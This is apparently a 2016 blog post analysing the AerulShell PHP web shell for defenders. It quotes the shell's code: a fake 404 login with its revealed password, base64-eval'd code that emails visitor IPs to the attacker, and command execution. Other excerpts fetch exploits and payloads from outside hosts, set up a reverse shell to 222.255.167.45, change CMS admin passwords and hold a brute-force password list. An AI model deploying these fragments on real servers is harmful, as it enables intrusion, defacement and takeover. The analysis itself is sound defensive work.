Thursday, September 1, 2016

AerulShell Web Shell Code Walk-Through

This Paste of the AerulShell v.4 appears to be a php webshell that an attacker can upload and get him backdoor access to compromise and manage your web server without you knowing it.

It's got some interesting features/pieces.

For authentication it requires that the parameter 'x' posted to the url has an md5 hash of c2b72f86b8ca51642c4a902887830d3e.

$auth_pass = "c2b72f86b8ca51642c4a902887830d3e";
if( ... ( md5($_POST['x']) == $auth_pass ) ) )
{ $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }


Which if you go to an md5 decryptor like this you see that the password is aerulcyber so you could login to it with something like www.hackedsite.com/evilpage.php?x=aerulcyber

Also if there is a login failure then it sends an email to the 'Boss' at root@aerulcyber.biz . How do I know this? If there is a login failure it calls PrintLogin() which is deceptively names as it actually has some obfuscated code of it's own.

function printLogin()
...
$shell_data = "JHZpc2l0Y291bn...;
eval(base64_decode($shell_data));


Which if deobfuscated actually sets a cookie on your browser, counts how many times you've been there, and sends an email with your ip address to the Boss.


$visitcount = $HTTP_COOKIE_VARS["visits"];
...
$visitor = $_SERVER["REMOTE_ADDR"];
...
$body = "Boss, there was an injected target on $target by $visitor";
@mail("root@aerulcyber.biz","http://$target $system by $visitor", "$body");


Also if you were to navigate to this page without the 'x' parameter it deceptively will look like an HTTP 404 page not found. But you should notice a textbox and submit button on the bottom. IF you enter the password mentioned above into the textbox and hit submit, it will log you into the web shell console.

<html>
...
<title>
404 Not Found
</title>
...
<form method=post>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit
value=''></center></address>
</form>


If you pass in the 'dl' parameter once logged in you can download a file, such as www.hackedsite.com/evil.php?dl=index.php would download the home page code.

if(isset($_GET['dl']) && ($_GET['dl'] != "")){
$file = $_GET['dl'];
$filez = @file_get_contents($file);
...echo $filez;


You could delete a file

if(isset($_GET['delete']) && ($_GET['delete'] != ""))
$file = $_GET['delete']; @unlink($file);


You could make a folder

elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
$path = $pwd.$_GET['mkdir']; @mkdir($path);


You could get a shell and post commands to it

elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
<table class="cmdbox">
<tr>
<td colspan="2">
<textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>


There's also attempts to download exploits , run them, and elevate you to root

$pilih = $_POST['pilih'];
if ( $pilih == 'autoroot1') {
mkdir('auto',0777);
$file = file_get_contents('http://svchost.nazuka.net/a.txt');
$IIIIIIIIl11I = fopen('auto/auto.pl','w');
chmod("auto/auto.pl",0777);
fwrite($IIIIIIIIl11I,$file);
fclose($IIIIIIIIl11I);
print 'autoroot telah diluncurkan Boss....


There are also additional "bonus tools" that the shell will download and execute , basically stripping text off pastebin.

$file = file_get_contents('http://pastebin.com/raw.php?i=gtTLMyya');
$IIIIIIIIl11I = fopen('meter.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=ctQsPjpn');
$IIIIIIIIl11I = fopen('wy.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=mGSK1EEa');
$IIIIIIIIl11I = fopen('back.php','w');

$file = file_get_contents('http://pastebin.com/raw.php?i=aBHs2nWR');
$IIIIIIIIl11I = fopen('back.pl','w');


You can pull up a reverse shell back to these ip addresses , it events gives the attacker friendly hints/reminders on how to use it.

+--=[ Backconnect Reverse Shell ]=--+
...
Choose Backconnect Command
...
<form method="post" action="">&
...
<option value="back1" > Perl Backconnect </option>
<option value="back2"> Php Backconnect </option>
<option value="back3"> Weevely </option>
<option value="back4"> Php Metasploit </option>
...
edit pada source script back.pl
my $ip = '222.255.167.45';
my $port = '57899';
...
edit pada source script back.php
$ip = '222.255.167.45';
$port = 57899;
...
edit pada source script back.pl
my $ip = '222.255.167.45';
my $port = '57899';
...
edit pada source script meter.php
$ip = '222.255.167.45';
$port = 57899;
...
usage : nc -lvvp 57899


You can upload a file to the hacked web server with a tool of your choice

<th colspan="2">Upload from url</th>
...
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</optoion>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>


You can deface the site and tell them why you did it

elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){?>

<input class="inputz" type="text" name="defacer" size="67" value="Aerul Da White-Hkc" /><br> <select class="inputz" name="hackmode">
<option>------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
...
<select class="inputz" name="reason">
<option >------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>


You could launch a port scan on somebody

function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);


Change the Joomla or Wordpress administrative passwords

$SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
$SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());


Try to bruteforce guess some default passwords

+--==[ Cpanel BruteForce ]==--+

abcd1234
abcdef
acb123
adm1n1strator
adm1nistrator
admin@123
admin1
ADMIN1
admin12
admin123
admin1234
admin123456


There are many more features if you dig deeper into the code. But hopefully this information above gives a good overview of the power and danger of web shells like AerulShell and gives you a bit more insight into the interworkings and the thought process behind the writers of web shells like this.







More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1 comment:

  1. I've just installed iStripper, so I can watch the hottest virtual strippers on my taskbar.

    ReplyDelete